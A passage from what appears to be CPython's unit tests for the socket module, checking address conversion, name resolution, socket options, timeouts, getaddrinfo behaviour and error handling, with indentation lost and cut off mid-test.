self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
